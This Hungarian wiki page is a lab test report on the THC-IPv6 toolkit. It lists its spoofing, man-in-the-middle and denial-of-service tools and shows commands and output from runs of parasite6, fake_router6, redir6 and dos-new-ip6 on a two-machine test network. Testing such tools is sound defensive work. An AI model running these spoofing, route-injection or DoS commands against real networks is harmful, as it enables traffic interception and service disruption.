#acl All:read = IPv6 specifikus hacking eszközök = A [[http://freeworld.thc.org/thc-ipv6/|THC-IPv6]] eszközkészlet célja különböző támadások megvalósítása, specifikusan az IPv6 protokollt célozva. A készlet a követekző eszközöket tartamazza: * '''alive6''' - felderítő eszköz, adott címre válaszoló rendszerekhez * '''detect-new-ip6''' - hálózathoz újonnan csatlakozó eszközök automatikus felderítése. * '''dos-new-ip6''' - címütközés hamisítása és így az újonnan csatlakozó eszközök működésének megbénítása. * '''fake_advertiser6''' - hirdetések hamisítása. * '''fake_mipv6''' - mobil IP címek hamis kérése. * '''fake_mld6''' - Multicas csoport üzenetek hamisítására * '''fake_router6''' - Router üzenetek hamisítására, közbeékelődéses és forgalomelterelő támadásokhoz * '''parasite6''' - ICMP6 neighbour solicitation üzenetek hamisítására, például beékelődéses támadások létrehozásához * '''redir6''' - beékeléses támadás ICMP6 redirect üzenetek hamisításával * '''rsmurf6''' - Távoli smurf támadás * '''sendpees6''' - ND neighbour solicitation üzenetek generálás, a célpont CPU idejének fogyasztásához. * '''smurf6''' - Helyi smirf támadás. * '''toobig6''' - Hamis üzenetekkel MTU csökkentése. == A csomag telepítése == A teszt Debian Linux alatt történt, a telepítés csomagból történt. A következő lényeges csomagokat kellett telepíteni, az `apt-get install ...` csomagkezelő használatával: gcc, libc6, libc-dev, libpcap-dev, libssl-dev. Ezek után a THC forrásból fordítható. == THC tesztek == [[HackScreenshots| Képernyőképek az eszközök használatáról]] === Alive6 === ./alive6 eth0 Alive: fe80:0000:0000:0000:020c:29ff:fed8:f478 Found 1 systems alive Sikeresen felismerte a másik Linux-os gép Link Local IP címét. === Parasite6 === A spoofingot végző hoszt IP címei: {{{ ip -6 addr 1: lo: mtu 16436 inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: mtu 1492 qlen 1000 inet6 fec0::1/124 scope site valid_lft forever preferred_lft forever inet6 fe80::20c:29ff:fed8:f478/64 scope link valid_lft forever preferred_lft forever }}} Minden forgalom átirányítása saját maga felé, ezzel egyidőben a másik gépen ping6 forgalmat generalok, hogy legyen mit eltéríteni (ping6 fec0::3 -I eth0, ping6 fec0::4 -I eth0): {{{ ./parasite6 eth0 Remember to enable routing (ip_forwarding), you will denial service otherwise! Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ... Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0001 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fec0:0000:0000:0000:0000:0000:0000:0002 Spoofed packet to fe80:0000:0000:0000:020c:29ff:fed8:f478 as fe80:0000:0000:0000:0219:e0ff:fe14:6503 Spoofed packet to fe80:0000:0000:0000:0219:e0ff:fe14:6503 as fe80:0000:0000:0000:020c:29ff:fed8:f478 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0003 Spoofed packet to fec0:0000:0000:0000:0000:0000:0000:0002 as fec0:0000:0000:0000:0000:0000:0000:0004 }}} A másik gépen ezután több fals szomszéd is látszik: {{{ ip -6 neigh fec0::4 dev eth0 lladdr 00:19:e0:14:65:03 STALE fec0::3 dev eth0 lladdr 00:19:e0:14:65:03 STALE }}} === Fake_router6 === Előtte: {{{ ip -6 route fe80::/64 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332933sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332474sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255 }}} Jöhet a fals route beinjektálása: {{{ ./fake_router6 eth0 fe80::1 2001:2001::/32 1500 Starting to advertise router fe80::1 (Press Control-C to end) ... }}} Ezután a másik gép routing táblája: {{{ ip -6 route 2001:2001::/32 dev eth0 proto kernel metric 256 expires 8590469sec mtu 1492 advmss 1432 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332821sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21332362sec mtu 1492 advmss 1432 hoplimit 4294967295 default via fe80::1 dev eth0 proto kernel metric 1024 expires 65538sec mtu 1492 advmss 1432 hoplimit 255 unreachable default dev lo proto none metric -1 error -101 hoplimit 255 }}} Látható, hogy valóban bekerült az új routing bejegyzés. === Redir6 === Előtte: {{{ ip -6 route fe80::/64 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::/124 dev eth0 metric 256 expires 21332270sec mtu 1492 advmss 1432 hoplimit 4294967295 fec0::1:1 via fec0::5 dev eth0 metric 1024 expires 21334372sec mtu 1492 advmss 1432 hoplimit 4294967295 ff00::/8 dev eth0 metric 256 expires 21331811sec mtu 1492 advmss 1432 hoplimit 4294967295 unreachable default dev lo proto none metric -1 error -101 hoplimit 255 }}} Felvéve egy routot egy fec0::1:1 címre, ezt akarjuk majd eltéríteni. {{{ ./redir6 eth0 fec0::2 fec0::1:1 fec0::5 fec0::1 }}} Nem lett új route bejegyzés, de érdemes megnézni a capture fájlt. Valószínűleg a routerek hiánya miatt nem sikerült eltéríteni. === Dos-new-ip6 === {{{ ./dos-new-ip6 eth0 Started ICMP6 DAD Denial-of-Service (Press Control-C to end) ... Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0001 Spoofed packet for existing ip6 as fe80:0000:0000:0000:0000:0000:0000:0002 Spoofed packet for existing ip6 as fe80:0000:0000:0000:020c:29ff:fed8:f478 }}} Valóban nem enged új interfészeket feljönni a linkre. A detect-new-ip6 gyakoraltilag ugyanazt csinálja, mint az alive6. A smurf6 attack-ot nem lehet egy ilyen kicsi hálózat esetén kipróbálni (tulajdonképpen két ipv6 eszközvolt a próba során összekötve). A Debian nem reagált sem a smurf, sem a sendpees támadásra, csak a kérések láthatóak a vonalon. Az önkéntes Neighbor Advertisementre a másik gép nem reagál, nem írja be a szomszédok közé a hírdetett IP-t.